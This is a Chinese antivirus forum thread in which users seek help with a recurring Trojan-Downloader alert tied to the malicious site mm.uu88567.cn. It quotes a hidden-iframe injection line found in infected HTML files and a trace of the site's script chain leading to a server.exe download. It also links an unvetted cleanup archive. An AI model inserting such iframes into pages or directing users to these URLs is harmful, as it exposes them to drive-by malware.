瑞星卡卡安全论坛

Trojan-Downloader.Win32.Agent.giz 怎么杀啊 瑞星杀了又出来了。晕死了。
mm. uu88567. cn  / index / mm .htm  这个病毒 360 瑞星卡卡 和杀毒软件 都找不到，无法杀除，我打打开网页时候 瑞星有提示。

中此病毒后，办公软件不能打开。

点击 我的电脑  c d e 盘 我的文件夹 位置都改变成 一条线了。 变成一栏了 ，以前是三栏。

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ;  Embedded Web Browser from: http://bsalsa.com/)

附件: SREngLOG.log

日志查看无异常进程。
启动项中有一个应用程序，不知道是否楼主自行设置的。
C:\PROGRA~1\FOUNDE~1\AM32.exe

建议将异常现象截屏发上来看一下。
对于病毒来说，建议升级瑞星到最新版本，断网杀毒。

谢谢 ，你们的回帖率 让我感到高兴。。
网上认证 是xxx系统 （每次打开该软件认证xxx 瑞星就提示，提示完后 xxx系统就自动关闭）
--
第二图，电脑分三栏在病毒没有时候，共享文件在第一栏最上面  c d盘在中间栏  其他在第三栏
现在变成一栏。 不知道有什么方法可以解决，不解决对电脑有影响么？
谢谢。。

空白处，右键菜单选择“按组排列”

汗

还有那什么报网页的，我联系管理员看看去

那个就是恶意网址，瑞星拦截很正确。
Log is generated by FreShow.
[wide]http://mm.uu88567.cn/index/mm.htm
    [frame]http://mm.uu88567.cn/index/nYnTd14.htm
        [script]http://mm.uu88567.cn/index/14.js
            [object]http://down.114graph.com/bb/server.exe
        [script]http://mm.uu88567.cn/index/15.js
        [script]http://mm.uu88567.cn/index/16.js
    [frame]http://mm.uu88567.cn/index/yt.htm
    [frame]http://mm.uu88567.cn/index/nYnTdxxz.htm
    [frame]http://mm.uu88567.cn/index/yut.htm
    [script]http://js.tongji.linezing.com/944527/tongji.js

现在又出现了这个提示了。总共2个这样的提示。
有什么方法可以 解决这个问题呢？ 我在网上找了一堆关于这个站的问题，可都没有解决方案啊。
希望瑞星能给个方法  谢谢了。

版主 这个问题如何解决呢？ 能给一个指引方案么？ 谢谢

每次打开 认证 系统 瑞星软件都提示 以删除该病毒 然后跳出 一个建议提示，可是我是通过 认证软件 并没有通过ie访问这个网站。

我找了很多杀毒软件 目前无法彻底删除 。。。。
55555555555555:kaka4:
我用的是瑞星正版杀毒软件。

是局域网么

不是局域网 是宽带

只是在使用固定程序才出问题么

对的 固定程序 ，
只有在我打开认真软件才有提示

打开那个认证软件时 它是不是自动访问某个网站？网址呢？

新发现，通过瑞星卡  专杀工具 下载东西的时候。360有提示

但我还是没办法 把他去除啊。。

大家帮我想个方法啊 。。

在线等

因 打开的是软件 不好判断 软件访问的什么网站
http://www.chinazxt.com/pages/support/wtjd/index.htm 这个就是 和软件连在一起的网站。需要通过他认证

这个网页没问题

http://www.discuz.net/thread-1178169-1-1.html
http://topic.csdn.net/u/20090226/15/b0a63a13-bddf-4bbb-8935-2cf2d3486c47.html
http://www.tianya.cn/publicforum/content/it/1/501343.shtml
http://baike.360.cn/4071464/23330127.html
http://bbs.zdnet.com.cn/thread-1145851-1-1.html
http://pop.pcpop.com/doc/5681857/1.html

本人在网上 找了一堆 同病相怜  的，就没一个解决方案。

只能联系软件的出品商了...

这个是电脑软件中 病毒了。
难道必须 重装系统，在重装认证软件 才能实现么？
5555555完了 我电脑是服务器，要装很多很多东西。装几天哦。
艾……
卡卡反病毒小组  你想想用什么破解的么

重装应该无效
只能联系软件厂商
可能是那边的服务器故障了..

Trojan-Downloader.Win32.Agent.giz这个瑞星报的是什么文件？
先用360或卡卡扫描下系统漏洞 打全所有补丁 报的那个带毒链接和安全更新KB911562相关。。
还不行就等软件厂商解决了

只能联系软件厂商
可能是那边的服务器故障了..
----------
按你这么说，我 ，本地使用的电脑没有中病毒 ？是 认证软件公司的网站 被挂马？

日志是无异常的

应该是服务器问题..

我又扫描一次电脑。

朋友 ，你能在帮我看看 是否有问题么？
谢谢

附件: SREngLOG.log

scripting.filesystemobject  漏洞对象名

日志中这项c:\windows\system32\drivers\bdguard.sys 是百度搜霸相关文件，不过也可能是病毒伪装，最好删除

整一个瑞星公司就没一个人能解决？？:kaka6:
我也碰到相同的问题，是用迅雷下载时总碰到这样的提示。

网上看到一个解决办法，但是不知道怎么打开

原文：网页木马查找清除代码
2009年07月21日 今天发现自己的站点全部都感染了网页代码，电脑所有的网页的代码都有<iframe src=http://mm.uu88567.cn/index/mm.htm width=100 height=0></iframe> 这样的一段代码。（小心不链这个网站，挂有马的。）网站的网页都被挂马了。于是在网上搜了一下解决方案，在CSDN的网站上有人共享了一段代码，把问题解决了。现在将清除代码共享出来。

下载地址：http://www.bcollar.cn/blog/wp-content/uploads/2009/07/kill.rar

我也碰到类似的问题，是在使用遨游浏览器时碰到的！
360和金山清理专家等都查不出来！每次打开遨游360和网盾都会出现提示！所以我查了一到了遨游目录里的一些index.htm文件，发现这些是涉及到设置页面以及起始页的文件，里面有（<iframe src=http://mm.uu88567.cn/index/mm.htm width=100 height=0></iframe>）代码！全部找到，并删除掉！浏览器使用就正常了,不知道别处是否还有代码！
    估计前面有类似的情况的朋友，也是这些相关的软件里的一些HTM文件里被嵌入了这些恶意代码！希望能帮上！:kaka1: :default6:

下载下来的是ASP文件啊，该怎么执行大哥说明一下。